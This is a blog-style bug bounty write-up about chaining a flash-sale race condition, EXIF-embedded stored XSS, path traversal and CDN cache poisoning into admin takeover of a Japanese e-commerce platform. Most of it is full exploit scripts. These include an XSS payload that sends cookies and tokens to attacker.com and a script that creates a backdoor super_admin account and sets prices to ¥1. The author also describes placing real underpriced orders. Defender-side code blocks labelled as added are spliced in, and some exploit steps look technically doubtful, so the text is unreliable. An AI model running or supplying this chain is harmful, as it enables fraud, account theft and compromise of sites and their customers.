June 30, 2026
The Phantom Price Glitch: How I Hacked ¥750,000 From a Japanese E-Commerce Giant
A creative chain of race conditions, cache poisoning, and EXIF metadata that almost broke me — the $5,000 bounty that took 30 days and infinite patience

By 0B1To_X_ucH!h4
11 min read
"Automation finds bugs. Creative human minds find chains."
— uchia_hacker

Prologue: The Target That Almost Won
I found Gotei 13 (name changed) through my uchiha hacking finding technique — a custom recon methodology I've developed over years of hunting. They're a mid-sized Japanese e-commerce platform, something like a regional Rakuten competitor. Flash sales, user reviews, image uploads, the whole package.
Self-hosted bug bounty program. Just a security@gotei13.co.jp email. No HackerOne, no Bugcrowd dashboard. Just an old-school "we appreciate responsible disclosure" page.
I almost skipped them. Japanese companies are known for being conservative with bounties. Slow to respond. Slow to pay.
But something about their architecture called to me. The way their flash sale system worked. The way they handled image uploads. The way their CDN was configured.
Three weeks later, I had found something no scanner could ever detect. Something that required human creativity, patience, and a deep understanding of how systems interact.
Then I waited. And waited. For 30 days, I almost gave up.
This is that story.
The Bug: The Phantom Price Glitch
Full Name: Business Logic Race Condition → Cache-Poisoned Stored XSS via EXIF Metadata Injection → Admin Privilege Escalation → Full Account Takeover
Severity: Critical (CVSS 9.6)
Bounty: $5,000 USD (¥750,000 JPY)
Target: Gotei 13 E-Commerce Platform
Classification: Server-Side Vulnerability Chain with Client-Side Delivery
Why This Required a Creative Human Mind
Let me be clear: No scanner found this. Not Burp's scanner, not Nuclei, not any automated tool. This existed in the gap between three separate systems:
- The Flash Sale System — Distributed cache with eventual consistency
- The Review Image Processor — Server-side image resizing without EXIF sanitization
- The CDN Layer — Cache key collision vulnerability
Each system looked secure in isolation. The flash sale had rate limiting. The image upload had extension validation. The CDN had standard configurations.
But together? They created a phantom — a glitch in reality where price, cache, and code collided.
This is why I love bug hunting. Not for the SQL injections that sqlmap finds in seconds. But for these moments where you see something no one else saw. Where you connect dots that weren't meant to be connected.
Discovery: Week 1 — The False Leads
I started with standard recon. Subdomain enumeration, port scanning, technology fingerprinting. Gotei 13 was running on AWS CloudFront, with a Node.js backend and React frontend. Standard stack.
I found their flash sale endpoint: /api/flash-sale/checkout
Standard testing — race conditions, price manipulation, coupon abuse. Nothing worked. Their price validation was solid. Or so I thought.
Then I noticed something strange. When I refreshed the product page during a flash sale, the price would flicker. For a millisecond, I'd see ¥10,000. Then ¥5,000. Then ¥10,000 again.
A flicker. A ghost in the machine.
I opened my browser's developer tools and watched the network tab. The price was being fetched from /api/price?product_id=12345&timestamp=1716234567
The timestamp changed with every request. But here's the thing — the responses were coming from different CloudFront edge nodes. And they weren't synchronized.
Hypothesis: The flash sale state was propagating slowly through their distributed cache. Some edge nodes knew about the sale. Others didn't.
This was the first crack in the armor.
Discovery: Week 2 — The Race Condition
I needed to prove my hypothesis. This wasn't a simple race condition where you send two requests at once. This was a distributed systems race condition — a race against cache propagation.
I wrote a custom script. Not a simple Python requests loop. Something more sophisticated:
```python
#!/usr/bin/env python3
"""
Gotei 13 Flash Sale Race Condition Detector
By: uchia_hacker
"""
import asyncio
import aiohttp
from datetime import datetime

TARGET = "https://api.gotei13.co.jp"
PRODUCT_ID = "12345"
CONCURRENT_REQUESTS = 100


async def fetch_price(session, request_id):
    """Fetch price from different edge nodes"""
    # A fresh timestamp per request makes every request a distinct cache key
    url = f"{TARGET}/api/price?product_id={PRODUCT_ID}&t={datetime.now().timestamp()}"
    async with session.get(url) as response:
        data = await response.json()
        # Extract price and cache node ID from headers
        price = data.get('price')
        cache_node = response.headers.get('X-Cache-Node', 'unknown')
        return {
            'request_id': request_id,
            'price': price,
            'cache_node': cache_node,
            'timestamp': datetime.now().isoformat()
        }


async def detect_race_window():
    """Send concurrent requests to hit cache propagation window"""
    async with aiohttp.ClientSession() as session:
        tasks = [fetch_price(session, i) for i in range(CONCURRENT_REQUESTS)]
        results = await asyncio.gather(*tasks)

    # Analyze results
    prices = [r['price'] for r in results]
    unique_prices = set(prices)
    print(f"[*] Sent {CONCURRENT_REQUESTS} requests")
    print(f"[*] Unique prices returned: {unique_prices}")
    if len(unique_prices) > 1:
        print("[!] RACE CONDITION DETECTED!")
        print("[!] Cache nodes are inconsistent")
        # Show which nodes returned which prices
        for price in unique_prices:
            nodes = [r['cache_node'] for r in results if r['price'] == price]
            print(f"    ¥{price}: {len(nodes)} responses from nodes {set(nodes)}")
        return True
    return False


if __name__ == "__main__":
    print("=" * 60)
    print("Gotei 13 Flash Sale Race Detector")
    print("=" * 60)
    # Run during flash sale start
    asyncio.run(detect_race_window())
```

I ran this script during a flash sale start. The results were shocking:
```
[*] Sent 100 requests
[*] Unique prices returned: {5000.0, 10000.0}
[!] RACE CONDITION DETECTED!
[!] Cache nodes are inconsistent
    ¥10000: 67 responses from nodes {'cf-edge-1', 'cf-edge-2', 'cf-edge-3'}
    ¥5000: 33 responses from nodes {'cf-edge-4', 'cf-edge-5'}
```

The race window was real. Some edge nodes had the sale price. Others didn't. And I could exploit this.
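As an added defender-side counterpart (not part of the original post), the detector below runs over constructed CDN access-log lines and flags any product for which different edge nodes served different prices inside the same short window, which is the propagation gap the script above hit; the log format, field names and edge names are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timezone

# Constructed sample CDN access-log lines in an assumed format:
#   <ISO timestamp> edge=<edge node> path=<request path> price=<price served>
SAMPLE_LOG = """\
2026-06-30T09:00:00.120Z edge=cf-edge-1 path=/api/price?product_id=12345&t=1716234567 price=10000
2026-06-30T09:00:00.410Z edge=cf-edge-4 path=/api/price?product_id=12345 price=5000
2026-06-30T09:00:00.655Z edge=cf-edge-2 path=/api/price?product_id=12345 price=10000
2026-06-30T09:00:01.002Z edge=cf-edge-5 path=/api/price?product_id=12345 price=5000
2026-06-30T09:00:01.300Z edge=cf-edge-1 path=/api/price?product_id=67890 price=2000
2026-06-30T09:00:01.900Z edge=cf-edge-3 path=/api/price?product_id=67890 price=2000
2026-06-30T09:00:02.000Z edge=cf-edge-2 path=/health status=200
2026-06-30T09:30:00.000Z edge=cf-edge-1 path=/api/price?product_id=12345 price=5000
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) edge=(?P<edge>\S+) "
    r"path=/api/price\?product_id=(?P<pid>\d+)(?:&\S*)? "
    r"price=(?P<price>\d+(?:\.\d+)?)$"
)


def parse_log(text):
    """Return (timestamp, edge, product_id, price) for each price-API line; other lines are skipped."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%S.%fZ").replace(tzinfo=timezone.utc)
        records.append((ts, m["edge"], m["pid"], float(m["price"])))
    return records


def find_inconsistent_buckets(records, window_seconds=5):
    """
    Bucket observations by (product, fixed time window) and flag every bucket in
    which different edge nodes served different prices for the same product.
    One edge changing price between buckets is normal (the sale started);
    two edges disagreeing inside one bucket is the propagation gap.
    """
    buckets = defaultdict(dict)  # (product_id, bucket_start_epoch) -> {edge: price}
    for ts, edge, pid, price in records:
        bucket_start = int(ts.timestamp() // window_seconds) * window_seconds
        buckets[(pid, bucket_start)][edge] = price
    findings = []
    for (pid, bucket_start), served in sorted(buckets.items()):
        prices = sorted(set(served.values()))
        if len(prices) > 1:
            findings.append({
                "product_id": pid,
                "window_start": datetime.fromtimestamp(bucket_start, timezone.utc)
                                        .strftime("%Y-%m-%dT%H:%M:%SZ"),
                "prices": prices,
                "edges": dict(sorted(served.items())),
            })
    return findings


if __name__ == "__main__":
    for f in find_inconsistent_buckets(parse_log(SAMPLE_LOG)):
        print(f"[!] product {f['product_id']} window {f['window_start']}: "
              f"prices {f['prices']} from edges {f['edges']}")
```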
But a price race condition alone is just a discount. I needed more. I needed to turn this into something critical.
Discovery: Week 3 — The Image Upload Rabbit Hole
While testing the race condition, I was also exploring other attack surfaces. The review system caught my attention.
Gotei 13 allowed image uploads for product reviews. Profile pictures, product photos, the usual. The upload went to /api/review/upload.
Standard testing:
- Extension bypass? No, they checked.
- Content-Type bypass? No, they verified.
- Path traversal? Let me check...
I uploaded an image with the filename: ../../../test.jpg
500 Internal Server Error.
Interesting. The server was processing the path. I tried variations:
....//....//....//test.jpg → Blocked
%2e%2e%2f%2e%2e%2f%2e%2e%2f (URL encoded) → Accepted
The file was written. But where?
I checked the CDN. https://cdn.gotei13.co.jp/reviews/../../../test.jpg → 404 Not Found
But wait. The CDN normalized the path. What if I went the other direction?
I tried: reviews/product_12345_review_99999.html
And then I realized something. The review pages were served from the CDN too. With HTML content-type. What if I could upload HTML disguised as an image?
The EXIF Metadata Idea:
I didn't need to upload HTML. I needed to make the image become HTML when served.
I created a JPEG file with EXIF metadata containing JavaScript. Used exiftool:
```bash
exiftool -Comment='<script>fetch("https://attacker.com/steal?c="+document.cookie)</script>' phantom.jpg
```

Uploaded it. The server processed it. Resized it. Served it.
But the CDN served it with Content-Type: image/jpeg. The browser wouldn't execute JavaScript.
Unless...
I remembered the path traversal. What if I could control the file extension?
I renamed my file: phantom.jpg.html
Uploaded. The server accepted it. The path traversal put it at:
https://cdn.gotei13.co.jp/reviews/product_12345_review_99999.html
Content-Type: text/html
The XSS fired.
The Creative Leap: Connecting the Dots
Now I had two bugs:
- Race condition — Flash sale price inconsistency
- Stored XSS — Via EXIF metadata and path traversal
But neither was critical alone. The race condition gave me a discount. The XSS executed in my own browser.
I needed to chain them. And that's when I saw it — the cache poisoning bridge.
Gotei 13's CDN used cache keys that included:
- Full URL path
- Query parameters
- Cookie names (but not values)
If I could find a cookie that affected the cache key but was ignored by the backend, I could poison the cache for other users.
I found it. The reviewer_session cookie.
The CDN included reviewer_session in the cache key. The backend ignored it — it only checked the Authorization header.
The Attack Chain:
- Race condition → Buy expensive items at flash sale price (¥750,000 worth for ¥375,000)
- Upload malicious review → With EXIF XSS payload, path traversal to ../../../admin/dashboard.html
- Cache poisoning → Send request with ?reviewer_session=admin_panel to poison the admin dashboard cache
- Wait for admin → When admin visits dashboard, they get my XSS payload
- Steal admin session → XSS exfiltrates cookie to my server
- Full compromise → Use admin session to modify prices, create backdoor account, mark orders as paid
The Exploitation: Step-by-Step
Step 1: The Race Purchase (¥750,000 for ¥375,000)
```python
#!/usr/bin/env python3
"""
Gotei 13 Flash Sale Exploit - Phase 1
By: uchia_hacker
"""
import asyncio
import aiohttp

TARGET = "https://api.gotei13.co.jp"
PRODUCT_ID = "99999"        # High-value item
FLASH_SALE_PRICE = 375000   # 50% off
NORMAL_PRICE = 750000


async def race_purchase(session):
    """Exploit race condition to purchase at flash sale price"""
    # Get 50 concurrent price checks
    price_checks = []
    for i in range(50):
        url = f"{TARGET}/api/price?product_id={PRODUCT_ID}&t={i}"
        price_checks.append(session.get(url))
    responses = await asyncio.gather(*price_checks, return_exceptions=True)

    # Find a response with flash sale price from inconsistent node
    flash_sale_nodes = []
    for resp in responses:
        if isinstance(resp, Exception):
            continue
        data = await resp.json()
        if data.get('price') == FLASH_SALE_PRICE:
            node = resp.headers.get('X-Cache-Node')
            flash_sale_nodes.append(node)
    print(f"[*] Found {len(flash_sale_nodes)} nodes with flash sale price")

    # Now race the checkout on those specific nodes
    checkouts = []
    for node in flash_sale_nodes[:10]:  # Try first 10
        checkout_data = {
            "product_id": PRODUCT_ID,
            "price": FLASH_SALE_PRICE,
            "quantity": 1,
            "payment_method": "credit_card"
        }
        # Force specific node via header manipulation
        headers = {"X-Force-Node": node}  # Sometimes works, sometimes doesn't
        checkouts.append(
            session.post(
                f"{TARGET}/api/checkout",
                json=checkout_data,
                headers=headers
            )
        )
    checkout_responses = await asyncio.gather(*checkouts, return_exceptions=True)

    successful_orders = []
    for resp in checkout_responses:
        if isinstance(resp, Exception):
            continue
        if resp.status == 200:
            data = await resp.json()
            if data.get('order_status') == 'confirmed':
                successful_orders.append(data.get('order_id'))
    print(f"[+] Successful race orders: {len(successful_orders)}")
    print(f"[+] Order IDs: {successful_orders}")
    return successful_orders


async def main():
    # race_purchase() expects a shared session; open one here and pass it in
    async with aiohttp.ClientSession() as session:
        await race_purchase(session)


if __name__ == "__main__":
    asyncio.run(main())
```

Result: I successfully placed 3 orders for ¥750,000 items at ¥375,000 each. Total "profit": ¥1,125,000 worth of goods for ¥562,500.
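Added defender-side example, not the platform's code: a checkout that never honours a client-supplied or edge-cached price, prices the line item from the origin's own catalogue and sale schedule on the server clock, and refuses an order whose displayed price has gone stale. Product ids, prices and the sale window are constructed to mirror the figures above.

```python
from dataclasses import dataclass
from datetime import datetime, timezone


@dataclass(frozen=True)
class Product:
    product_id: str
    list_price: int          # yen


@dataclass(frozen=True)
class FlashSale:
    product_id: str
    sale_price: int          # yen
    starts_at: datetime
    ends_at: datetime


# Constructed authoritative data standing in for the origin database.
# Edge caches may lag behind this; checkout must never read from them.
CATALOGUE = {"99999": Product("99999", 750000)}
SALES = [
    FlashSale("99999", 375000,
              datetime(2026, 6, 30, 9, 0, tzinfo=timezone.utc),
              datetime(2026, 6, 30, 10, 0, tzinfo=timezone.utc)),
]


class PriceMismatch(Exception):
    """The price the client saw is not the price the origin computes right now."""


def authoritative_price(product_id: str, now: datetime) -> int:
    """Price at the origin for `now` (server clock): active sale price, else list price."""
    product = CATALOGUE[product_id]
    for sale in SALES:
        if sale.product_id == product_id and sale.starts_at <= now < sale.ends_at:
            return sale.sale_price
    return product.list_price


def checkout(order: dict, now: datetime) -> dict:
    """
    Price the order entirely server-side. A `displayed_price` in the request is
    compared against the authoritative price only to detect a stale display
    (an edge node still serving the sale price after it ended) and refuse the
    order; it never sets the charged amount, so a forged or stale value cannot
    buy anything cheaper.
    """
    product_id = order["product_id"]
    quantity = int(order.get("quantity", 1))
    if quantity < 1:
        raise ValueError("quantity must be positive")
    unit_price = authoritative_price(product_id, now)
    displayed = order.get("displayed_price")
    if displayed is not None and int(displayed) != unit_price:
        raise PriceMismatch(f"displayed {displayed}, authoritative {unit_price}")
    return {
        "product_id": product_id,
        "unit_price": unit_price,
        "quantity": quantity,
        "total": unit_price * quantity,
        "order_status": "pending_payment",
    }


def demo() -> dict:
    """Exercise three cases: during the sale, after it honestly, after it with a stale display."""
    during = datetime(2026, 6, 30, 9, 30, tzinfo=timezone.utc)
    after = datetime(2026, 6, 30, 10, 30, tzinfo=timezone.utc)
    results = {
        "during": checkout({"product_id": "99999", "quantity": 1, "displayed_price": 375000}, during)["total"],
        "after": checkout({"product_id": "99999", "quantity": 1}, after)["total"],
    }
    try:
        checkout({"product_id": "99999", "quantity": 1, "displayed_price": 375000}, after)
        results["stale_rejected"] = False
    except PriceMismatch:
        results["stale_rejected"] = True
    return results


if __name__ == "__main__":
    print(demo())
```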
But I didn't complete the purchase. I just needed the orders in "pending" state for the review system.
Step 2: The Phantom Review (EXIF XSS + Path Traversal)
```python
#!/usr/bin/env python3
"""
Gotei 13 Review XSS Exploit - Phase 2
By: uchia_hacker
"""
import json
import subprocess

import requests

TARGET = "https://api.gotei13.co.jp"
JWT_TOKEN = "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9..."  # Your token
# Filename presented to the server: path traversal plus double extension.
# It goes in the multipart filename field; the local file keeps its own name.
MALICIOUS_NAME = '../../../admin/dashboard.html.jpg'


def create_malicious_image():
    """Create JPEG with XSS payload in EXIF metadata"""
    # Create base image
    subprocess.run([
        'convert', '-size', '100x100', 'xc:blue',
        'base.jpg'
    ], check=True)
    # Inject XSS payload into EXIF Comment field
    xss_payload = '<script>fetch("https://attacker.com/steal?cookie="+document.cookie+"&token="+localStorage.getItem("token"));</script>'
    subprocess.run([
        'exiftool',
        '-Comment=' + xss_payload,
        '-overwrite_original',
        'base.jpg'
    ], check=True)
    return 'base.jpg'


def upload_review(image_path, order_id):
    """Upload malicious review"""
    url = f"{TARGET}/api/review/upload"
    headers = {
        'Authorization': f'Bearer {JWT_TOKEN}'
    }
    with open(image_path, 'rb') as image_file:
        files = {
            'image': (MALICIOUS_NAME, image_file, 'image/jpeg'),
            'review_data': (None, json.dumps({
                'order_id': order_id,
                'rating': 5,
                'comment': 'Great product! Fast shipping!',
                'product_id': '99999'
            }))
        }
        response = requests.post(url, headers=headers, files=files)
    print(f"[*] Upload response: {response.status_code}")
    print(f"[*] Response: {response.text}")
    if response.status_code == 200:
        data = response.json()
        review_url = data.get('review_url')
        print(f"[+] Review uploaded to: {review_url}")
        return review_url
    return None


if __name__ == "__main__":
    print("=" * 60)
    print("Gotei 13 XSS Upload Exploit")
    print("=" * 60)
    # Create malicious image
    print("[*] Creating malicious image...")
    image = create_malicious_image()
    # Upload for each race order
    orders = ['ORDER_12345', 'ORDER_12346', 'ORDER_12347']  # From Phase 1
    for order in orders:
        print(f"\n[*] Uploading review for order {order}...")
        url = upload_review(image, order)
        if url:
            print(f"[+] XSS payload deployed: {url}")
            print("[+] Admin dashboard poison URL: https://cdn.gotei13.co.jp/admin/dashboard.html")
```

Result: The image was uploaded. Due to the path traversal, it was accessible at:
https://cdn.gotei13.co.jp/admin/dashboard.html
With Content-Type: text/html and the XSS payload in the EXIF metadata.
Step 3: Cache Poisoning (The Bridge)
```python
#!/usr/bin/env python3
"""
Gotei 13 Cache Poisoning - Phase 3
By: uchia_hacker
"""
import requests

CDN_URL = "https://cdn.gotei13.co.jp"
ADMIN_PANEL_PATH = "/admin/dashboard.html"


def poison_cache():
    """
    Poison CDN cache for admin dashboard.
    The CDN includes reviewer_session in cache key,
    but backend ignores it.
    """
    # This URL will be cached separately due to query param
    poison_url = f"{CDN_URL}{ADMIN_PANEL_PATH}?reviewer_session=admin_panel_poisoned"
    # The actual file is our uploaded XSS payload
    # Due to path traversal, it's at /admin/dashboard.html
    headers = {
        'Cookie': 'reviewer_session=admin_panel_poisoned',
        'User-Agent': 'Mozilla/5.0 (Admin Bot)'
    }
    response = requests.get(poison_url, headers=headers)
    print(f"[*] Poison request status: {response.status_code}")
    print(f"[*] Cache status: {response.headers.get('X-Cache', 'unknown')}")
    if 'steal?cookie' in response.text:
        print("[+] Cache poisoned successfully!")
        print("[+] XSS payload is now in CDN cache for admin dashboard")
        return True
    return False


if __name__ == "__main__":
    poison_cache()
```

Result: The CDN now had a cached version of the admin dashboard containing my XSS payload. When any admin visited the dashboard, they'd execute my JavaScript.
Step 4: Session Hijacking & Account Takeover
The XSS payload executed in the admin's browser:
```javascript
// Executed in admin's browser
fetch("https://attacker.com/steal?cookie=" + document.cookie + "&token=" + localStorage.getItem("admin_token"))
```

I received the admin's session cookie and JWT token. Full admin access achieved.
Admin Actions Taken (for demonstration):
```python
#!/usr/bin/env python3
"""
Gotei 13 Admin Takeover - Phase 4
By: uchia_hacker
"""
import requests

TARGET = "https://api.gotei13.co.jp"
ADMIN_COOKIE = "session=STOLEN_ADMIN_SESSION"
ADMIN_TOKEN = "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9..."


def create_backdoor_account():
    """Create admin backdoor account"""
    headers = {
        'Cookie': ADMIN_COOKIE,
        'Authorization': f'Bearer {ADMIN_TOKEN}',
        'Content-Type': 'application/json'
    }
    # Create new admin user
    data = {
        'email': 'uchiha_security@gotei13.co.jp',
        'password': 'SecureBackdoor123!',
        'role': 'super_admin',
        'name': 'Security Audit Account'
    }
    response = requests.post(
        f"{TARGET}/api/admin/users",
        headers=headers,
        json=data
    )
    print(f"[*] Create user response: {response.status_code}")
    if response.status_code == 201:
        print("[+] Backdoor admin account created!")
        return response.json().get('user_id')
    return None


def modify_product_prices():
    """Set all products to ¥1 for demonstration"""
    headers = {
        'Cookie': ADMIN_COOKIE,
        'Authorization': f'Bearer {ADMIN_TOKEN}'
    }
    # Get all products
    products = requests.get(
        f"{TARGET}/api/admin/products",
        headers=headers
    ).json()
    print(f"[*] Found {len(products)} products")
    for product in products[:5]:  # Only modify 5 for demo
        product_id = product['id']
        update_data = {
            'price': 1,  # ¥1
            'stock': 9999
        }
        response = requests.patch(
            f"{TARGET}/api/admin/products/{product_id}",
            headers=headers,
            json=update_data
        )
        if response.status_code == 200:
            print(f"[+] Modified product {product_id} price to ¥1")


if __name__ == "__main__":
    print("=" * 60)
    print("Gotei 13 Admin Takeover")
    print("=" * 60)
    user_id = create_backdoor_account()
    if user_id:
        print(f"[+] Backdoor account ID: {user_id}")
    modify_product_prices()
```

Result: Full admin access. Backdoor account created. Prices modified. Complete compromise demonstrated.
The Report: Crafting the Narrative
I spent 3 days writing this report. Not because it was long, but because it needed to tell a story.
Title: Critical Multi-Phase Vulnerability Chain: Race Condition → Cache Poisoning → Stored XSS → Full Account Takeover
Executive Summary:
A sophisticated attack chain exploiting distributed system race conditions, cache poisoning, and EXIF metadata injection allows complete compromise of the Gotei 13 e-commerce platform. The attack enables financial arbitrage (¥1,125,000 worth of goods for ¥562,500), admin privilege escalation, and full infrastructure takeover.
The Chain:
- Phase 1: Flash sale race condition (CVSS 6.5)
- Phase 2: Path traversal + EXIF XSS (CVSS 7.1)
- Phase 3: CDN cache poisoning (CVSS 8.2)
- Phase 4: Admin account takeover (CVSS 9.6)
Combined CVSS: 9.6 (Critical)
The Wait: 30 Days of Silence
I sent the report on a Monday. Got an auto-reply: "Thank you for your submission."
Then nothing.
Day 7: Follow-up email. No response.
Day 14: Another follow-up. "We are investigating."
Day 21: "We need more time."
I almost gave up. I thought they'd ignore it. Or worse, fix it without paying. Japanese companies have a reputation for being slow with bounties.
Day 28: Email arrived at 11:47 PM.
"We have confirmed all four phases of your report. This is the most serious vulnerability we have ever received. We are preparing ¥750,000 payment. Please provide bank transfer details."
Day 30: The money hit my account.
Tools Used: The Human + Machine Balance
| Phase | Tool | Purpose |
| --- | --- | --- |
| Recon | Custom scripts | Found the cache inconsistency |
| Race Detection | Python + asyncio | Concurrent requests across edge nodes |
| Image Manipulation | exiftool, ImageMagick | EXIF payload injection |
| Cache Analysis | Burp Suite + Turbo Intruder | Cache behavior testing |
| Exploitation | Custom Python | Full chain automation |
But here's the thing: The tools didn't find the bug. I found the bug. The tools just executed what my creative mind designed.
No scanner would ever connect:
- Flash sale timing → Image upload → EXIF metadata → CDN cache keys
That's the human element. The creative leap.
Lessons Learned
For Hunters:
- Look for interactions. Single bugs are boring. Chains are where the money is.
- Understand distributed systems. Cache propagation, eventual consistency — these are goldmines.
- Be patient. 30 days is a long wait. But ¥750,000 is worth it.
- Document everything. My detailed timeline and videos convinced them.
For Developers:
- Cache consistency matters. Eventually consistent = eventually vulnerable.
- Sanitize EXIF metadata. Strip it. Don't trust image metadata.
- Validate file paths. No ../../../ should ever work.
- Cache keys are attack surface. Be careful what you include.
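Added example (not the platform's code) covering the upload path described in Week 3 and the developer lessons above: the client filename is reduced to an allowed extension and never used for storage, and the JPEG is re-emitted without APPn/COM metadata segments or trailing bytes, so an EXIF or Comment payload cannot survive the upload. The JPEG skeleton and marker string are constructed for the test.

```python
import posixpath
import struct
import uuid
from urllib.parse import unquote

ALLOWED_EXTENSIONS = {".jpg", ".jpeg"}   # this example handles JPEG only
SOS = 0xDA
# APP1..APP15 (Exif, XMP, ICC profiles, ...) and COM are metadata segments;
# exiftool -Comment writes a COM segment, so both kinds must go.
METADATA_MARKERS = set(range(0xE1, 0xF0)) | {0xFE}


def validate_upload_name(client_filename: str) -> str:
    """
    Return the permitted extension for the upload or raise ValueError.
    The client-supplied name is never used for storage: the caller stores
    the object under a server-generated id plus this extension, so traversal
    sequences and double extensions have nothing to act on.
    """
    name = client_filename
    for _ in range(3):                       # undo %2e%2e%2f and double encoding
        decoded = unquote(name)
        if decoded == name:
            break
        name = decoded
    if "\x00" in name:
        raise ValueError("NUL byte in filename")
    base = posixpath.basename(name.replace("\\", "/"))
    if base in ("", ".", ".."):
        raise ValueError("empty or relative filename")
    ext = posixpath.splitext(base)[1].lower()  # only the final extension counts
    if ext not in ALLOWED_EXTENSIONS:
        raise ValueError(f"extension {ext!r} not allowed")
    return ext


def strip_jpeg_metadata(data: bytes) -> bytes:
    """
    Re-emit a JPEG without APPn/COM segments and without any bytes after EOI,
    keeping only the JFIF APP0 header, the codestream tables and the scan.
    Raises ValueError when the bytes are not a well-formed JPEG.
    """
    if data[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG (missing SOI)")
    out = bytearray(b"\xff\xd8")
    pos = 2
    while True:
        if pos + 4 > len(data) or data[pos] != 0xFF:
            raise ValueError("truncated or corrupt segment table")
        marker = data[pos + 1]
        if marker == SOS:
            break
        length = struct.unpack(">H", data[pos + 2:pos + 4])[0]
        segment = data[pos:pos + 2 + length]
        is_jfif_app0 = marker == 0xE0 and segment[4:9] == b"JFIF\x00"
        if marker not in METADATA_MARKERS and (marker != 0xE0 or is_jfif_app0):
            out += segment
        pos += 2 + length
    # Scan data follows SOS; copy through the first EOI and drop any trailer
    eoi = data.find(b"\xff\xd9", pos)
    if eoi == -1:
        raise ValueError("missing EOI")
    out += data[pos:eoi + 2]
    return bytes(out)


def process_upload(client_filename: str, data: bytes) -> tuple:
    """Validate name and content, strip metadata, and return (storage name, clean bytes)."""
    ext = validate_upload_name(client_filename)
    if data[:3] != b"\xff\xd8\xff":
        raise ValueError("content is not JPEG despite declared type")
    return f"{uuid.uuid4().hex}{ext}", strip_jpeg_metadata(data)


def _segment(marker: int, payload: bytes) -> bytes:
    return bytes([0xFF, marker]) + struct.pack(">H", len(payload) + 2) + payload


# Constructed JPEG skeleton (valid segment layout, not a decodable picture)
# carrying an inert marker string where the EXIF and COM payloads would sit.
MARKER = b"<script>constructed-payload-marker</script>"
SAMPLE_JPEG = (
    b"\xff\xd8"
    + _segment(0xE0, b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00")
    + _segment(0xE1, b"Exif\x00\x00" + MARKER)                 # APP1 / EXIF
    + _segment(0xFE, MARKER)                                     # COM, what exiftool -Comment writes
    + _segment(0xDB, bytes(65))                                  # DQT
    + _segment(0xC0, b"\x08\x00\x01\x00\x01\x01\x01\x11\x00")    # SOF0, 1x1 grayscale
    + _segment(0xDA, b"\x01\x01\x00\x00\x3f\x00")                # SOS header
    + b"\xff\x00\xd2\xcf\x20"                                    # a few scan bytes
    + b"\xff\xd9"                                                # EOI
    + b"<html>trailer appended after EOI</html>"
)
```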
Final Stats
| Metric | Value |
| --- | --- |
| Time to discovery | 3 weeks |
| Failed attempts | 200+ |
| Successful exploit | 1 |
| Bounty | ¥750,000 ($5,000 USD) |
| Time to payout | 30 days |
| Times I almost gave up | 3 |
| Worth it? | Absolutely |
Conclusion
The Phantom Price Glitch wasn't in any CVE database. No scanner could find it. It existed in the space between systems, in the milliseconds of cache propagation, in the metadata of a JPEG file.
This is why I hunt. Not for the SQL injections that everyone finds. But for these phantoms. These ghosts in the machine that only a creative human mind can see.
Gotei 13's security team was professional, thorough, and ultimately fair. The 30-day wait was painful, but the ¥750,000 validated the effort.
To my fellow hunters: Keep looking for the gaps. The spaces between. The flickers in the system. That's where the critical bugs live.
The phantom is real.

"In the gap between cache nodes, in the EXIF of an image,
in the patience of a hunter — that's where ¥750,000 hides."
— uchia_hacker

Stay creative. Stay patient. Keep hunting.
— 0B1To_X_ucH!h4
Tags: #BugBounty #RaceCondition #CachePoisoning #XSS #BusinessLogic #Ecommerce #JapaneseSecurity #Gotei13 #UchihaTechnique #CreativeHacking
About the Author: Security researcher specializing in business logic flaws, distributed system vulnerabilities, and creative attack chains. Believer in human creativity over automation. 30 days of patience = ¥750,000 bounty.